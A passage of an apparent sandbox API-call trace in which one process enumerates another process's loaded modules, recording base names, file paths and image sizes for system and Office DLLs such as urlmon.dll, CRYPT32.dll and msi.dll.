lpmodinfo=0x25271a0*(lpBaseOfDll=0x7feff510000, SizeOfImage=0x178000, EntryPoint=0x7feff5110e0)) returned 1 [0067.648] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.648] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff510000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="urlmon.dll") returned 0xa [0067.651] CoTaskMemFree (pv=0xd910e0) [0067.651] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.651] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff510000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")) returned 0x1e [0067.654] CoTaskMemFree (pv=0xd910e0) [0067.654] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd9e0000, lpmodinfo=0x2529360, cb=0x18 | out: lpmodinfo=0x2529360*(lpBaseOfDll=0x7fefd9e0000, SizeOfImage=0x16d000, EntryPoint=0x7fefd9e10b4)) returned 1 [0067.656] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.656] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd9e0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0067.659] CoTaskMemFree (pv=0xd910e0) [0067.659] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.659] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd9e0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPT32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0067.669] CoTaskMemFree (pv=0xd910e0) [0067.669] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd820000, lpmodinfo=0x252b520, cb=0x18 | out: lpmodinfo=0x252b520*(lpBaseOfDll=0x7fefd820000, SizeOfImage=0xf000, EntryPoint=0x7fefd821020)) returned 1 [0067.671] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.671] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd820000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0067.674] CoTaskMemFree (pv=0xd910e0) [0067.675] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.675] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd820000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSASN1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")) returned 0x1e [0067.678] CoTaskMemFree (pv=0xd910e0) [0067.678] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefeea0000, lpmodinfo=0x252d6e0, cb=0x18 | out: lpmodinfo=0x252d6e0*(lpBaseOfDll=0x7fefeea0000, SizeOfImage=0x259000, EntryPoint=0x7fefeea1340)) returned 1 [0067.681] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.682] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefeea0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="iertutil.dll") returned 0xc [0067.685] CoTaskMemFree (pv=0xd910e0) [0067.685] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.685] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefeea0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")) returned 0x20 [0067.689] CoTaskMemFree (pv=0xd910e0) [0067.689] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8bf0000, lpmodinfo=0x252f8b0, cb=0x18 | out: lpmodinfo=0x252f8b0*(lpBaseOfDll=0x7fef8bf0000, SizeOfImage=0x214000, EntryPoint=0x7fef8bf1000)) returned 1 [0067.692] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.692] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8bf0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="GROOVEEX.DLL") returned 0xc [0067.695] CoTaskMemFree (pv=0xd910e0) [0067.695] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.695] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8bf0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\PROGRA~1\\MICROS~1\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files\\micros~1\\office16\\grooveex.dll")) returned 0x2a [0067.698] CoTaskMemFree (pv=0xd910e0) [0067.698] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8bd0000, lpmodinfo=0x2531a90, cb=0x18 | out: lpmodinfo=0x2531a90*(lpBaseOfDll=0x7fef8bd0000, SizeOfImage=0x19000, EntryPoint=0x7fef8bdee50)) returned 1 [0067.700] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.700] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8bd0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="VCRUNTIME140.dll") returned 0x10 [0067.703] CoTaskMemFree (pv=0xd910e0) [0067.704] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.704] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8bd0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\VCRUNTIME140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll")) returned 0x24 [0067.707] CoTaskMemFree (pv=0xd910e0) [0067.707] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8bc0000, lpmodinfo=0x2533c70, cb=0x18 | out: lpmodinfo=0x2533c70*(lpBaseOfDll=0x7fef8bc0000, SizeOfImage=0x4000, EntryPoint=0x0)) returned 1 [0067.710] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.710] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8bc0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="api-ms-win-crt-runtime-l1-1-0.dll") returned 0x21 [0067.713] CoTaskMemFree (pv=0xd910e0) [0067.713] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.713] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8bc0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-runtime-l1-1-0.dll")) returned 0x35 [0067.716] CoTaskMemFree (pv=0xd910e0) [0067.716] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8ac0000, lpmodinfo=0x2535e90, cb=0x18 | out: lpmodinfo=0x2535e90*(lpBaseOfDll=0x7fef8ac0000, SizeOfImage=0xf2000, EntryPoint=0x7fef8ac9060)) returned 1 [0067.719] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.719] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8ac0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ucrtbase.DLL") returned 0xc [0067.722] CoTaskMemFree (pv=0xd910e0) [0067.723] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.723] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8ac0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ucrtbase.DLL" (normalized: "c:\\windows\\system32\\ucrtbase.dll")) returned 0x20 [0067.726] CoTaskMemFree (pv=0xd910e0) [0067.726] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8ab0000, lpmodinfo=0x2538060, cb=0x18 | out: lpmodinfo=0x2538060*(lpBaseOfDll=0x7fef8ab0000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0067.728] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.729] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8ab0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="api-ms-win-core-timezone-l1-1-0.dll") returned 0x23 [0067.732] CoTaskMemFree (pv=0xd910e0) [0067.732] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.732] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8ab0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll")) returned 0x37 [0067.735] CoTaskMemFree (pv=0xd910e0) [0067.735] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8aa0000, lpmodinfo=0x253a280, cb=0x18 | out: lpmodinfo=0x253a280*(lpBaseOfDll=0x7fef8aa0000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0067.739] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.739] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8aa0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="api-ms-win-core-file-l2-1-0.dll") returned 0x1f [0067.742] CoTaskMemFree (pv=0xd910e0) [0067.742] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.743] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8aa0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l2-1-0.dll")) returned 0x33 [0067.746] CoTaskMemFree (pv=0xd910e0) [0067.746] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8a90000, lpmodinfo=0x253c490, cb=0x18 | out: lpmodinfo=0x253c490*(lpBaseOfDll=0x7fef8a90000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0067.750] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.750] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8a90000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="api-ms-win-core-localization-l1-2-0.dll") returned 0x27 [0067.754] CoTaskMemFree (pv=0xd910e0) [0067.754] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.754] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8a90000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-localization-l1-2-0.dll")) returned 0x3b [0067.757] CoTaskMemFree (pv=0xd910e0) [0067.757] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9210000, lpmodinfo=0x253e6c0, cb=0x18 | out: lpmodinfo=0x253e6c0*(lpBaseOfDll=0x7fef9210000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0067.760] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.760] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9210000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="api-ms-win-core-synch-l1-2-0.dll") returned 0x20 [0067.763] CoTaskMemFree (pv=0xd910e0) [0067.763] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.763] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9210000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll")) returned 0x34 [0067.766] CoTaskMemFree (pv=0xd910e0) [0067.766] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8a80000, lpmodinfo=0x25408e0, cb=0x18 | out: lpmodinfo=0x25408e0*(lpBaseOfDll=0x7fef8a80000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0067.771] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.771] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8a80000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="api-ms-win-core-processthreads-l1-1-1.dll") returned 0x29 [0067.774] CoTaskMemFree (pv=0xd910e0) [0067.774] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.774] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8a80000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll")) returned 0x3d [0067.777] CoTaskMemFree (pv=0xd910e0) [0067.777] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8a70000, lpmodinfo=0x2542b20, cb=0x18 | out: lpmodinfo=0x2542b20*(lpBaseOfDll=0x7fef8a70000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0067.780] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.781] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8a70000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="api-ms-win-core-file-l1-2-0.dll") returned 0x1f [0067.784] CoTaskMemFree (pv=0xd910e0) [0067.784] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.784] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8a70000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l1-2-0.dll")) returned 0x33 [0067.788] CoTaskMemFree (pv=0xd910e0) [0067.788] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8a60000, lpmodinfo=0x2544d30, cb=0x18 | out: lpmodinfo=0x2544d30*(lpBaseOfDll=0x7fef8a60000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0067.791] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.791] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8a60000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="api-ms-win-crt-heap-l1-1-0.dll") returned 0x1e [0067.794] CoTaskMemFree (pv=0xd910e0) [0067.794] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.794] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8a60000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-heap-l1-1-0.dll")) returned 0x32 [0067.798] CoTaskMemFree (pv=0xd910e0) [0067.798] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8a50000, lpmodinfo=0x2546f40, cb=0x18 | out: lpmodinfo=0x2546f40*(lpBaseOfDll=0x7fef8a50000, SizeOfImage=0x4000, EntryPoint=0x0)) returned 1 [0067.802] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.802] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8a50000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="api-ms-win-crt-string-l1-1-0.dll") returned 0x20 [0067.805] CoTaskMemFree (pv=0xd910e0) [0067.805] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.805] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8a50000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-string-l1-1-0.dll")) returned 0x34 [0067.808] CoTaskMemFree (pv=0xd910e0) [0067.808] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8a40000, lpmodinfo=0x2549160, cb=0x18 | out: lpmodinfo=0x2549160*(lpBaseOfDll=0x7fef8a40000, SizeOfImage=0x4000, EntryPoint=0x0)) returned 1 [0067.812] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.812] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8a40000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="api-ms-win-crt-stdio-l1-1-0.dll") returned 0x1f [0067.815] CoTaskMemFree (pv=0xd910e0) [0067.815] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.815] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8a40000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-stdio-l1-1-0.dll")) returned 0x33 [0067.820] CoTaskMemFree (pv=0xd910e0) [0067.820] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8a30000, lpmodinfo=0x254b388, cb=0x18 | out: lpmodinfo=0x254b388*(lpBaseOfDll=0x7fef8a30000, SizeOfImage=0x4000, EntryPoint=0x0)) returned 1 [0067.823] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.823] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8a30000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="api-ms-win-crt-convert-l1-1-0.dll") returned 0x21 [0067.827] CoTaskMemFree (pv=0xd910e0) [0067.827] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.827] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8a30000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-convert-l1-1-0.dll")) returned 0x35 [0067.831] CoTaskMemFree (pv=0xd910e0) [0067.831] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8990000, lpmodinfo=0x254d5a8, cb=0x18 | out: lpmodinfo=0x254d5a8*(lpBaseOfDll=0x7fef8990000, SizeOfImage=0x91000, EntryPoint=0x7fef89e2430)) returned 1 [0067.834] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.834] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8990000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="MSVCP140.dll") returned 0xc [0067.837] CoTaskMemFree (pv=0xd910e0) [0067.838] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.838] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8990000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSVCP140.dll" (normalized: "c:\\windows\\system32\\msvcp140.dll")) returned 0x20 [0067.841] CoTaskMemFree (pv=0xd910e0) [0067.841] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8980000, lpmodinfo=0x254f778, cb=0x18 | out: lpmodinfo=0x254f778*(lpBaseOfDll=0x7fef8980000, SizeOfImage=0xc000, EntryPoint=0x7fef8984150)) returned 1 [0067.845] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.845] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8980000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="VCRUNTIME140_1.dll") returned 0x12 [0067.849] CoTaskMemFree (pv=0xd910e0) [0067.849] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.849] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8980000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\VCRUNTIME140_1.dll" (normalized: "c:\\windows\\system32\\vcruntime140_1.dll")) returned 0x26 [0067.852] CoTaskMemFree (pv=0xd910e0) [0067.853] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8970000, lpmodinfo=0x2551958, cb=0x18 | out: lpmodinfo=0x2551958*(lpBaseOfDll=0x7fef8970000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0067.856] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.856] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8970000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="api-ms-win-crt-locale-l1-1-0.dll") returned 0x20 [0067.860] CoTaskMemFree (pv=0xd910e0) [0067.860] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.860] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8970000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-locale-l1-1-0.dll")) returned 0x34 [0067.865] CoTaskMemFree (pv=0xd910e0) [0067.865] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8960000, lpmodinfo=0x2553f90, cb=0x18 | out: lpmodinfo=0x2553f90*(lpBaseOfDll=0x7fef8960000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0067.868] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.868] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8960000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="api-ms-win-crt-filesystem-l1-1-0.dll") returned 0x24 [0067.872] CoTaskMemFree (pv=0xd910e0) [0067.872] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.872] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8960000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-filesystem-l1-1-0.dll")) returned 0x38 [0067.876] CoTaskMemFree (pv=0xd910e0) [0067.876] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8950000, lpmodinfo=0x25561c0, cb=0x18 | out: lpmodinfo=0x25561c0*(lpBaseOfDll=0x7fef8950000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0067.880] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.880] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8950000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="api-ms-win-crt-time-l1-1-0.dll") returned 0x1e [0067.884] CoTaskMemFree (pv=0xd910e0) [0067.884] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.884] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8950000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-time-l1-1-0.dll")) returned 0x32 [0067.889] CoTaskMemFree (pv=0xd910e0) [0067.889] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8940000, lpmodinfo=0x25583d0, cb=0x18 | out: lpmodinfo=0x25583d0*(lpBaseOfDll=0x7fef8940000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0067.893] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.893] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8940000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="api-ms-win-crt-environment-l1-1-0.dll") returned 0x25 [0067.897] CoTaskMemFree (pv=0xd910e0) [0067.897] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.897] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8940000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-environment-l1-1-0.dll")) returned 0x39 [0067.901] CoTaskMemFree (pv=0xd910e0) [0067.901] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8930000, lpmodinfo=0x255a600, cb=0x18 | out: lpmodinfo=0x255a600*(lpBaseOfDll=0x7fef8930000, SizeOfImage=0x5000, EntryPoint=0x0)) returned 1 [0067.905] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.905] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8930000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="api-ms-win-crt-math-l1-1-0.dll") returned 0x1e [0067.908] CoTaskMemFree (pv=0xd910e0) [0067.909] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.909] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8930000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-math-l1-1-0.dll")) returned 0x32 [0067.913] CoTaskMemFree (pv=0xd910e0) [0067.913] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8920000, lpmodinfo=0x255c810, cb=0x18 | out: lpmodinfo=0x255c810*(lpBaseOfDll=0x7fef8920000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0067.916] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.916] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8920000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="api-ms-win-crt-utility-l1-1-0.dll") returned 0x21 [0067.921] CoTaskMemFree (pv=0xd910e0) [0067.921] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.921] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8920000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-utility-l1-1-0.dll")) returned 0x35 [0067.926] CoTaskMemFree (pv=0xd910e0) [0067.926] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8600000, lpmodinfo=0x255ea30, cb=0x18 | out: lpmodinfo=0x255ea30*(lpBaseOfDll=0x7fef8600000, SizeOfImage=0x316000, EntryPoint=0x7fef8603e98)) returned 1 [0067.930] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.930] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8600000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="msi.dll") returned 0x7 [0067.934] CoTaskMemFree (pv=0xd910e0) [0067.934] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.934] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8600000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll")) returned 0x1b [0067.938] CoTaskMemFree (pv=0xd910e0) [0067.938] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef7bc0000, lpmodinfo=0x2560be0, cb=0x18 | out: lpmodinfo=0x2560be0*(lpBaseOfDll=0x7fef7bc0000, SizeOfImage=0x87e000, EntryPoint=0x0)) returned 1 [0067.942] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.942] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef7bc0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="GrooveIntlResource.dll") returned 0x16 [0067.946] CoTaskMemFree (pv=0xd910e0) [0067.946] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.946] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef7bc0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\PROGRA~1\\MICROS~1\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files\\micros~1\\office16\\1033\\grooveintlresource.dll")) returned 0x39 [0067.950] CoTaskMemFree (pv=0xd910e0) [0067.950] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef7b80000, lpmodinfo=0x2562df0, cb=0x18 | out: lpmodinfo=0x2562df0*(lpBaseOfDll=0x7fef7b80000, SizeOfImage=0x35000, EntryPoint=0x7fef7b8c59c)) returned 1 [0067.954] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.954] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef7b80000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="EhStorShell.dll") returned 0xf [0067.959] CoTaskMemFree (pv=0xd910e0) [0067.959] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.959] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef7b80000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll")) returned 0x23 [0067.963] CoTaskMemFree (pv=0xd910e0) [0067.963] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef7b00000, lpmodinfo=0x2564fc0, cb=0x18 | out: lpmodinfo=0x2564fc0*(lpBaseOfDll=0x7fef7b00000, SizeOfImage=0x7e000, EntryPoint=0x7fef7b01304)) returned 1 [0067.967] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.967] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef7b00000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="cscui.dll") returned 0x9 [0067.971] CoTaskMemFree (pv=0xd910e0) [0067.971] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.971] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef7b00000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll")) returned 0x1d [0067.978] CoTaskMemFree (pv=0xd910e0) [0067.978] GetModuleInformation (in: 